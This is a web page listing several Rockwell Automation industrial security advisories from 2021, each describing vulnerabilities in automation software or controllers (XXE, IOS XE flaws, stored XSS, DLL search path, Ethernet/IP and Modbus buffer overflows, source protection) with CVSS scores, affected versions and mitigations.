CVE-2022-1018
Products:
Using CCW with Micro800 Controllers, ISaGRAF, Using CCW with Component Class Drives, Using CCW with PanelView Component Terminals
CVSS Scores:
5.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision History
Version 1.0 – March 28, 2021

Executive Summary

Rockwell Automation received a report from the researcher Kimiya through Trend Micro’s Zero Day Initiative which identified vulnerabilities in Connected Components Workbench, ISaGRAF Workbench and Safety Instrumented Systems Workbench for AADvance and Trusted controllers. If successfully exploited, these vulnerabilities may result in information leakage and loss of confidentiality. This vulnerability requires user interaction through a phishing attack, for example, to be successfully exploited.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

  • Connected Component Workbench Version 12.00 and Below
  • ISaGRAF Workbench 6.6.9 and below
  • Safety Instrumented Systems Workstation 1.1 and below

Vulnerability Details

CVE-2022-1018 XML External Entity Leads to Information Leak

When opening a malicious solution file provided by an attacker, the application suffers from an XML External Entity vulnerability due to an unsafe call within a dynamic link library file.

As a result, this could be exploited to pass data of local files of the victim to a remote web server controlled by an attacker leading to a loss of confidentiality.

CVSS v3.1 Base Score: 5.5/10 [Medium]
CVSS v3.1 Vector: AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Risk Mitigation & User Action

Customers using the affected versions of this software are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Product Suggested Actions
Connected Components Workbench Version  12.00 and below Customers should update to Version 13.00 which mitigates this vulnerability.
ISaGRAF Workbench 6.6.9 and below
It is recommended that customers follow the guidelines below until a patch is available.
SIS Workstation 1.1 and below Customers should update to version 1.2 which mitigates this vulnerability.

If an upgrade is not possible or available, customers should consider deploying the following mitigations:
  • Run Connected Components Workbench as a User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Do not open untrusted files with Connected Component Workbench, ISaGRAF, SISW. Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.
  • Use of Microsoft AppLocker or other similar allow list application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at QA17329 - Using Rockwell Automation Software Products with AppLocker
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.

General Security Guidelines

  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see PN715 - Advisory on web search tools that identify ICS devices and systems connected to the Internet
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.
Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the Knowledgebase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the PSIRT Inbox (PSIRT@rockwellautomation.com).

Additional Links

High
PN1558 | PN1558 | Stratix Switches Impacted by IOS and IOS XE Software Vulnerabilities
Published Date:
March 26, 2021
Last Updated:
March 26, 2021
CVE IDs:
CVE-2021-1452, CVE-2021-1442, CVE-2021-1443, CVE-2021-1392, CVE-2021-1403, CVE-2021-1220, CVE-2021-1352
Products:
Stratix 5400 Industrial Ethernet Switch, Stratix 8300 L3 Modular Managed Switch, Stratix 5410 Ind Distribution Switch, Stratix 8000 Modular Managed Switch
CVSS Scores:
7.8, 7.4, 6.8, 4.3, 5.5, 7.0
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 - March 26, 2021. Initial release.

Executive Summary

Rockwell Automation received a report from Cisco regarding eight vulnerabilities in Stratix® switches. If successfully exploited, these vulnerabilities may result in denial-of-service conditions, unauthorized privilege escalation, web socket hijacking, relative path traversal or command injection.

Customers using affected versions of this firmware are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

CVE ID Affected Product Family Affected Versions





CVE-2021-1392
Stratix 5800
16.12.01 and earlier

Stratix 8000
Stratix 5700
Stratix 5410
Stratix 5400

15.2(7)E3 and earlier

Stratix 8300
All Versions
CVE-2021-1403 Stratix 5800 16.12.01 and earlier
CVE-2021-1352 Stratix 5800 17.04.01 and earlier, if DECnet is enabled.
CVE-2021-1442 Stratix 5800 16.12.01 and earlier
CVE-2021-1452 Stratix 5800 16.12.01 and earlier
CVE-2021-1443 Stratix 5800 17.04.01 and earlier
CVE-2021-1220
CVE-2021- 1356		 Stratix 5800 17.04.01 and earlier

Vulnerability Details

CVE-2021-1392: IOS and IOS XE Software Common Industrial Protocol (CIP) Privilege Escalation Vulnerability
A vulnerability in the CLI command permissions of Cisco® IOS and Cisco IOS XE software could allow an authenticated, local attacker to retrieve the password for Common Industrial Protocol (CIP™) and then remotely configure the affected device as an administrative user.

CVSS v3.1 Base Score: 7.8/10[High]
CVSS v3.1 Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2021-1403: IOS XE Software Web UI Cross-Site WebSocket Hijacking Vulnerability
A vulnerability in the web UI feature of Cisco IOS XE software could allow an unauthenticated, remote attacker to conduct a cross-site WebSocket hijacking (CSWSH) attack and cause a denial of service (DoS) condition on an affected device.

CVSS v3.1 Base Score: 7.4/10[High]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:N/A:H

CVE-2021-1352: IOS XE Software DECnet Phase IV/OSI Denial of Service Vulnerability
A vulnerability in the DECnet protocol processing of Cisco IOS XE software could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition on an affected device. An attacker could exploit this vulnerability by sending DECnet traffic to an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition.

This vulnerability affects Stratix 5800 devices if they are running a vulnerable release of Cisco IOS XE software and have the DECnet protocol enabled. DECnet is not enabled by default.

CVSS v3.1 Base Score: 7.4 /10[High]
CVSS v3.1 Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CVE-2021-1442: IOS XE Software Plug-and-Play Privilege Escalation Vulnerability
A vulnerability in a diagnostic command for the Plug and Play (PnP) subsystem of Cisco IOS XE software could allow an authenticated, local attacker to elevate privileges to the level of an Administrator on an affected Stratix 5800.

Plug and Play is disabled after Express Setup has completed.

CVSS v3.1 Base Score: 7.0/10[High]
CVSS v3.1 Vector: CVSS: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

CVE-2021-1452: IOS XE ROM Monitor Software OS Command Injection Vulnerability
A vulnerability in the Stratix 5800 switches could allow an unauthenticated, physical attacker to execute persistent code at boot time and break the chain of trust.

CVSS v3.1 Base Score: 6.8/10[Medium]
CVSS v3.1 Vector: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVE-2021-1443: IOS XE Software Web UI OS Command Injection Vulnerability
A vulnerability in the web UI of the IOS XE software could allow a remote, authenticated attacker to execute arbitrary code with root privileges on the underlying operating system of the affected device. To exploit this vulnerability, an attacker would need to have Admin credentials to the device.

CVSS v3.1 Base Score: 5.5/10[Medium]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:H/A:N

CVE-2021-1220/CVE-2021- 1356: IOS XE Software Web UI Denial-of-Service Vulnerabilities
Multiple vulnerabilities in the Web UI feature of IOS XE software could allow an authenticated, remote attacker with read-only privileges to cause the web management software to hang and consume vty line instances resulting in a denial-of-service (DoS) condition.

CVSS v3.1 Base Score: 4.3/10[Medium]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L

Risk Mitigation & User Action

Customers using the affected Stratix devices are encouraged to update to an available firmware revision that addresses the associated risk.

Where a fix is not yet available, customers are directed towards the risk mitigation strategies provided below, and are encouraged, when possible, to apply general security guidelines to employ multiple strategies simultaneously.

Currently, Rockwell Automation is working to address these vulnerabilities and will continue to provide updates as these fixes become available.
CVE ID Affected Product Family Affected Firmware Versions Suggested Actions





CVE-2021-1392
Stratix 5800
16.12.01 and earlier		 Apply version 17.04.01 or later.

Stratix 8000
Stratix 5700
Stratix 5410
Stratix 5400

15.2(7)E3 and earlier		 Confirm that the least-privilege user principle is followed, and user account access to is only granted with a minimum number of rights as needed.

Stratix 8300
All Versions
 Migrate to contemporary solution.
CVE-2021-1403 Stratix 5800 16.12.01 and earlier Apply version 17.04.01 or later.
CVE-2021-1352 Stratix 5800 17.04.01 and earlier, if DECnet is enabled. If possible, disable DECnet protocol completely or on select interfaces.


To reduce risk, customers should confirm they are employing proper network segmentation and security controls. Specifically, network exposure for all control system devices should be minimized, and control systems should be behind firewalls and isolated from other networks when possible. See the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide for best practices deploying network segmentation and broader defense in depth strategies.
CVE-2021-1442 Stratix 5800 16.12.01 and earlier Apply version 17.04.01 or later.
CVE-2021-1452 Stratix 5800 16.12.01 and earlier Apply version 17.04.01 or later.
CVE-2021-1443 Stratix 5800 17.04.01 and earlier Confirm that the least-privilege user principle is followed, and user account access to is only granted with a minimum number of rights as needed.
CVE-2021-1220
CVE-2021- 1356		 Stratix 5800 17.04.01 and earlier Confirm that the least-privilege user principle is followed, and user account access to is only granted with a minimum number of rights as needed.

General Security Guidelines


Network-based Vulnerability Mitigations for Embedded Products
  • Us proper network infrastructure controls, such as firewalls, to help confirm that traffic from unauthorized sources is blocked.
  • Consult the product documentation for specific features, such as a hardware mode switch setting, to which may be used to block unauthorized changes, etc.
Software/PC-based Mitigation Strategies
  • Confirm that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum number of rights as needed.
General Mitigations
  • Use trusted firmware, antivirus/antimalware programs and interact only with trusted websites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715..
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

High
PN1551 | PN1551 | 1734-AENTR Series B and Series C Contains Multiple Web Vulnerabilities
Published Date:
March 04, 2021
Last Updated:
March 04, 2021
CVE IDs:
CVE-2020-14504, CVE-2020-14502
Products:
1734 Point I/O
CVSS Scores:
7.5, 4.7
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 – March 4, 2021. Initial Release.

Executive Summary

Rockwell Automation received a report from Adam Eliot of the Loon Security Team regarding two vulnerabilities in the web interface of the 1734-AENTR Series B and Series C communications module. If successfully exploited, these vulnerabilities may lead to data modification on the device.

Customers using affected versions of this firmware are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

1734-AENTR Series B, versions 4.001 to 4.005, and 5.011 to 5.01.
1734-AENTR Series C, versions 6.011 and 6.012.

Vulnerability Details

CVE-2020-14504: Unauthenticated HTTP POST Requests
The web interface of the 1734-AENTR communication module mishandles authentication for HTTP POST requests. A remote, unauthenticated attacker can send a crafted request which may allow for modification of the configuration settings.

CVSSv3.1 Base Score: 7.5/10 [HIGH]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

CVE-2020-14502: Stored Cross Site Scripting (XXS)
The web interface of the 1734-AENTR Communications module is vulnerable to stored XSS. A remote, unauthenticated attacker could store a malicious script within the web interface that, when executed, could modify some string values on the “Home” page of the web interface.

CVSS v3.1 Base Score: 4.7/10 [MEDIUM]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

Risk Mitigation & User Action

Customers using the affected 1734-AENTR Series B and Series C are encouraged to update to an available firmware version that addresses the associated risk. Customers who are unable to update are directed towards risk mitigation strategies provided below, and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability Details Recommended User Actions
CVE-2020-14504
CVE-2020-14502		 1734-AENTR Series B, update to firmware version 5.018. (Download).

1734-AENTR Series C, update to firmware version 6.013. (Download).

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that traffic from unauthorized sources are blocked.

General Mitigations
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the KnoweldgeBase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

High
PN1543 | PN1543 | Writable Path Directory in DriveTools SP and Drives AOP
Published Date:
February 15, 2021
Last Updated:
February 15, 2021
CVE IDs:
CVE-2021-22665
Products:
9303 DriveTools SP
CVSS Scores:
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

 

Revision History
Revision Number
1.1

Executive Summary

Rockwell Automation received a report from both Cim Stordal of Cognite and Claroty regarding a vulnerability in DriveTools™ and Drives AOP. If successfully exploited, this vulnerability may result in privilege escalation and total loss of device confidentiality, integrity, and availability.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Special thanks to both Cognite and Claroty for their work discovering this vulnerability.

Affected Products

DriveExecutive v5.13 and below.
DriveTools SP v5.13 and below.
Drives AOP v4.12 and below.

Vulnerability Details

CVE-2021-22665: Privilege Escalation Vulnerability due to Uncontrolled Search Path Element
DriveTools and Drives AOP both contain a vulnerability that a local attacker with limited privileges may be able to exploit resulting in privilege escalation and complete control of the system.

CVSS v3.1 Score: 7.5/10 High
CVSS v3.1 Vector String: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:H

Risk Mitigation & User Action

Customers using the affected versions are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed towards the risk mitigation strategies provided below and are encouraged, when possible, to combine these with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability Suggested Actions
CVE-2021-22665 Apply DriveTools SP v5.14 or later Download).
Apply Drives AOP v4.13 or later (Download).

Customers using affected versions can reach out to their account manager or distributor to request a newer version.

General Security Guidelines

Software/PC-based Mitigation Strategies
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft AppLocker or other similar allow list application can help mitigate risk.  Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article QA17329 .
  • Ensure that the least-privilege user principle is followed, and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.

General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
 
When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to PSA/PN/Security Notifications. This can be done by updating settings in Account Overview within the KnoweldgeBase.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).

ADDITIONAL LINKS

 

High
PN1531 | PN1531 | 1794-AENT Flex I/O Series B Contains Multiple Denial of Service Vulnerabilities
Published Date:
February 02, 2021
Last Updated:
February 02, 2021
CVE IDs:
CVE-2020-6085, CVE-2020-6084, CVE-2020-6088, CVE-2020-6083, CVE-2020-6087, CVE-2020-6086
Products:
Flex I/O, 1794 Flex, 1794/5094 Distributed I/O
CVSS Scores:
7.5
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.1
Revision History

November 4, 2020 - Version 1.1. Updated Vulnerability Details.


October 12, 2020 - Version 1.0. Initial Version.
Revision History
Revision Number
2.0
Revision History

February 2, 2021 - Version 2.0. Updated Risk Mitigation & User Actions.


Executive Summary

Rockwell Automation received a report from Jared Rittle of Cisco Talos regarding three vulnerabilities in the 1794-AENT Flex I/O Series B  adapter. If successfully exploited, these vulnerabilities may lead to denial-of-service conditions.

Customers using affected versions of this firmware are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

1794-AENT Flex I/O, Series B, versions 4.003 (and earlier).

Vulnerability Details

CVE-2020-6083: Denial of Service due to Ethernet/IP Request Path Port Segment Buffer Overflow
A buffer overflow vulnerability exists in the Ethernet/IP Request Path Port Segment. This vulnerability could allow a remote, unauthenticated attacker to send a malicious packet resulting in a denial-of-service condition on the device.

CVSS v3.1 Base Score: 7.5 /10 [HIGH]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2020-6084, CVE-2020-6085: Denial of Service due to Ethernet/IP Request Path Logical Segment Buffer Overflow
A buffer overflow vulnerability exists in the Ethernet/IP Request Path Logical Segment. This vulnerability could allow a remote unauthenticated attacker to send a malicious packet resulting in the device entering a fault state causing a denial-of-service condition.

CVSS v3.1 Base Score:7.5 /10 [HIGH]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVE-2020-6086, CVE-2020-6087: Denial of Service due to Ethernet/IP Request Path Data Segment Buffer Overflow
A buffer overflow vulnerability exists in the Ethernet/IP Request Path Data Segment. This vulnerability could allow a remote unauthenticated attacker to send a malicious packet resulting in the device entering a fault state causing a denial-of-service condition.

CVSS v3.1 Base Score:7.5 /10 [HIGH]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Version 1.1 Update:
CVE-2020-6088: Denial of Service due to Ethernet/IP Request Path Network Segment Buffer Overflow
A buffer overflow vulnerability exists in the Ethernet/IP Request Path Network Segment. This vulnerability could allow a remote, unauthenticated attacker to send a malicious packet resulting in a denial-of-service condition on the device.

CVSS v3.1 Base Score: 7.5 /10 [HIGH]
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Risk Mitigation & User Action

Customers using the affected firmware versions are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy. Please subscribe to updates to this advisory and the Industrial Security Advisory Index to stay notified.

Vulnerabilities Affected Products Suggested Mitigations
CVE-2020-6083
CVE-2020-6084
CVE-2020-6085
CVE-2020-6086
CVE-2020-6087
CVE-2020-6088		 1794-AENT Flex I/O, Series B, firmware versions 4.003 and earlier Version 2.0:
Apply firmware v4.004 (download).

Version 1.0:
It is recommended for customers to use this module in the Cell Area/Zone (Level 1) as defined on page 16 of the System Security Design Guidelines and only accept CIP connections from trusted sources via port 44818.

For successful exploitation, these vulnerabilities require Ethernet/IP packets to reach the destination device. To reduce risk, customers should ensure they are employing proper network segmentation and security controls. Specifically, network exposure for all control system devices should be minimized and control systems should be behind firewalls and isolated from other networks when possible. Refer to the Converged Plantwide Ethernet (CPwE) Design and Implementation Guide for best practices deploying network segmentation and broader defense-in-depth strategies

Customers should consider using proper network infrastructure controls, such as firewalls, UTM devices, VPN, or other security appliances.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Utilize proper network infrastructure controls, such as firewalls, to help ensure that traffic from unauthorized sources are blocked.

Social Engineering Mitigation Strategies
  • Do not click on or open URL links from untrusted sources.
  • Employ training and awareness programs to educate users on the warning signs of a phishing or social engineering attack.

General Mitigations Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems, and ensure that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article ID PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please refer to our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

Refer to the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation, located at: PN1354 - Industrial Security Advisory Index.

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions web site.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).
Please direct all media inquiries to Kolve Byrd (kabyrd@rockwellautomation.com).

High
PN1545 | PN1545 | Modbus Vulnerability may lead to Denial-of-Service conditions in the MicroLogix 1400 Controller
Published Date:
January 28, 2021
Last Updated:
January 28, 2021
CVE IDs:
CVE-2021-22659
Products:
1766 MicroLogix 1400
CVSS Scores:
8.1
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
1.0
Revision History
Version 1.0 - January 28, 2021. Initial release.

Executive Summary

Rockwell Automation received a report from Parul Sindhwad and Dr. Faruk Kazi from COE-CNDS, Veermata Jijabai Technological Institute (VJTI), India regarding a vulnerability in the MicroLogix™ 1400 controller. If successfully exploited, this vulnerability may result in denial-of-service conditions.

This vulnerability does not impact MicroLogix 1400 controller users who have Modbus TCP disabled.

Customers using affected versions of this controller are encouraged to evaluate the following mitigations and apply them appropriately to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.

Affected Products

MicroLogix 1400, all series version 21.6 and below.

Vulnerability Details

CVE-2021-22659: Buffer Overflow may lead to Denial-of-Service Conditions
A remote, unauthenticated attacker may be able to send specially crafted Modbus packet which would allow the attacker to retrieve or modify random values in the register. If successfully exploited, this may lead to a buffer overflow resulting in a denial-of-service condition. The FAULT LED will flash RED and communications may be lost. Recovery from denial-of-service condition requires the fault to be cleared by the user.

CVSS v3.1 Base Score: 8.1/10[HIGH]
CVSS v3.1 Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:H

Risk Mitigation & User Action

Customers using the affected controller are directed towards risk mitigation. They are encouraged, when possible, to combine this guidance with the general security guidelines for a comprehensive defense in depth strategy.

All users, if applicable, may disable Modbus TCP support if it is not necessary for their MicroLogix 1400 implementation. Without Modbus TCP enabled, a potential attacker does not have access to exploit the device using this vulnerability.

General Security Guidelines

Network-based Vulnerability Mitigations for Embedded Products
  • Utilize proper network infrastructure controls (such as firewalls) to help ensure Modbus TCP from unauthorized sources are blocked.
  • Block all traffic to EtherNet/IP™ or other CIP™ protocol-based devices from outside the Manufacturing Zone by blocking or restricting access to TCP and UDP Port# 2222 and Port# 44818 using proper network infrastructure controls, such as firewalls, UTM devices or other security appliances. For more information on TCP/UDP ports used by Rockwell Automation Products, see Knowledgebase Article BF7490.

Software/PC-based Mitigation Strategies
  • Run all software as User, not as an Administrator, to minimize the impact of malicious code on the infected system.
  • Use of Microsoft® AppLocker or other similar allow list application can help mitigate risk. Information on using AppLocker with Rockwell Automation products is available at Knowledgebase Article QA17329.
  • Ensure that the least-privilege user principle is followed and user/service account access to shared resources (such as a database) is only granted with a minimum amount of rights as needed.

General Mitigations
  • Use trusted software, software patches, antivirus/antimalware programs and interact only with trusted web sites and attachments.
  • Minimize network exposure for all control system devices and/or systems and confirm that they are not accessible from the Internet. For further information about the risks of unprotected Internet accessible control systems, please see Knowledgebase Article PN715.
  • Locate control system networks and devices behind firewalls and isolate them from the business network.
  • When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize that VPN is only as secure as the connected devices.

For further information on the Vulnerability Handling Process for Rockwell Automation, please see our Product Security Incident Response FAQ document.

Refer to our Industrial Network Architectures Page for comprehensive information about implementing validated architectures designed to complement security solutions.

See the Network Services Overview Page for information on network and security services for Rockwell Automation to enable assessment, design, implementation and management of validated, secure network architectures.

We also recommend that concerned customers continue to monitor this advisory by subscribing to updates on the Security Advisory Index for Rockwell Automation at PN1354 - Industrial Security Advisory Index. .

Rockwell Automation remains committed to making security enhancements to our systems in the future. For more information and for assistance with assessing the state of security of your existing control system, including improving your system-level security when using Rockwell Automation and other vendor controls products, you can visit the Rockwell Automation Security Solutions website.

Requests for additional information can be sent to the RASecure Inbox (rasecure@ra.rockwell.com).


ADDITIONAL LINKS

Medium
PN794 | PN794 | RSLogix 5000 Studio 5000 Logix Designer Source Protection Vulnerability
Published Date:
January 25, 2021
Last Updated:
January 25, 2021
CVE IDs:
CVE-2014-0755
Products:
Logix Designer
CVSS Scores:
6.3
Known Exploited Vulnerability (KEV):
No
Corrected:
No
Workaround:
No
Más información Less Details Chevron DownChevron Down

Revision History
Revision Number
2.0
Revision History
Version 2.0 – January 25, 2021 – Advisory updated for clarification.
Revision History
Revision Number
1.0
Revision History
Version 1.0 – February 04, 2014 – Initial Release. Originally Titled “RSLogix™ 5000 Password Vulnerability”.

Executive Summary

It has come to Rockwell Automation’s attention that a vulnerability exists in RSLogix 5000® and Studio 5000 Logix Designer® that, when exploited, provides access to content that was secured using Source Key Protection, and in some instances, may expose the password used for that protection.

Customers using affected versions of this software are encouraged to evaluate the mitigations provided below and apply the appropriate mitigations to their deployed products. Additional details relating to the discovered vulnerability, including affected products and recommended countermeasures, are provided herein.


Affected Products

Project content applying access control with Source Key Protection using an sk.dat file in RSLogix 5000 and/or Studio 5000 product software v7 and above.

Note: This does not apply to project content protected with License Source Protection. To determine what solution is in use, refer to Logix 5000 Controllers Security, 1756-PM016O-EN-P.

Vulnerability Details

CVE-2014-0755: Insufficiently Protected Credentials
A vulnerability exists in RSLogix 5000 and Studio 5000 Logix Designer that, when exploited, may allow a local, unauthenticated attacker to access and modify project files that are password protected using Source Key Protection and, in some instances, may expose those passwords. Project files include files with the ACD, L5X, or L5K extensions. Successful exploitation will not directly disrupt the operation of Rockwell Automation programmable controllers or other devices in the control system.

CVSS v2 Base Score: 6.3
CVSS v2 Vector: AV:L/AC:M/AU:N/C:C/I:C/A:N

Risk Mitigation & User Action

Customers using the affected software versions are encouraged to update to an available software revision that addresses the associated risk. Customers who are unable to update are directed toward the risk mitigation strategies provided below and are encouraged, when possible, to combine these tactics with the general security guidelines to employ multiple strategies simultaneously.
Vulnerability Details Recommended User Actions
CVE-2014-0755 Risk Mitigation Strategy A:
For stronger protection, apply License Source Protection introduced in v26.

To apply License Source Protection to content that is protected with Source Key Protection, the Source Key Protection must be removed prior to applying License Source Protection. Once content is protected with License Source Key, it must be downloaded to the appropriate controller to mitigate the risk associated with this vulnerability. Refer to Logix
5000 Controllers Security, 1756-PM016O-EN-P (rockwellautomation.com) for more information about Source Protection

Risk Mitigation Strategy B:
In addition to using current software, we also recommend the following actions to concerned customers who continue to use Source Key Protection. Where possible:
  • Adopt a practice to track creation and distribution of protected ACD files, including duplicates and derivates that contain protected content if these files may need to be found or potentially disposed of in the future.
  • Securely archive project files that contain content password protected with Source Key Protection in a manner that prevents unauthorized access. For instance, store project files that use Source Key Protection in physical and logical locations where access can be controlled, and the files are stored in a protected and potentially encrypted manner.
